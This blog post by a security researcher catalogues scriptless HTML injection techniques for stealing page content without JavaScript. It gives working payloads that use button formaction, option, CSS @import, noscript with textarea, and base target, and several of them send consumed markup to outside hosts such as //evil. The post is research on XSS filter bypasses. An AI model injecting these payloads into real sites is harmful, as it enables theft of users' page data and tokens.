Published 14 years 4 months ago • Last updated March 24, 2025 • ⏱️ 2 min read
Following up on @lcamtuf's post about a "post xss" world. I thought I'd chip in with some vectors he missed. The textarea consumption technique he mentioned isn't new and wasn't invented by "Eric Y. Chen, Sergey Gorbaty, Astha Singhal, and Colin Jackson." it was openly discussed on sla.ckers for many years (as usual) but anyway lets discuss vectors.
Using button is interesting because of two interesting specification changes in HTML5, one is the fact that the default type for a button is a submit and secondly the formaction attribute allows you to change it's parent form action. In addition button consumes HTML, allowing you store any html after button until the next or non existent closing button tag. Example vector:
<button name=xss type=submit formaction=//evil>I get consumed!
A strange fact is option also consumes HTML, pretty obvious when you think about it but could lead to info disclosure like the button example.
<form action=//evil><select name=xss><option><b>steal me!</b>
The CSS specification states that @import should continue parsing a url until it encounters a ending ";". This means you can use it to consume HTML. A vector like the following can steal data:
<style>@import//hackvertor.co.uk? <b>steal me!</b>;
Another interesting way to defeat XSS filters is to use the noscript tag as demonstrated by my attack against Caja's HTML filter.
<noscript><form action=http://google.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=pwnd><textarea name=contents></noscript>
It uses the noscript tag to generate a textarea that when enabled (because of no javascript present) consumes the HTML after. This can also be initiated using security=restricted on IE or the new HTML5 iframe sandbox option. Original report.
You can also use the target attribute to assign the contents of the HTML after to the window name and then later retrieve it x-domain after a user clicks an external link.
<base target=' steal me'<b>test</b>
So here we inject a base tag with a target attribute, the target then assigns everything after ' to the window.name and then can be retrieved when the user clicks to the external server.
That's all folks.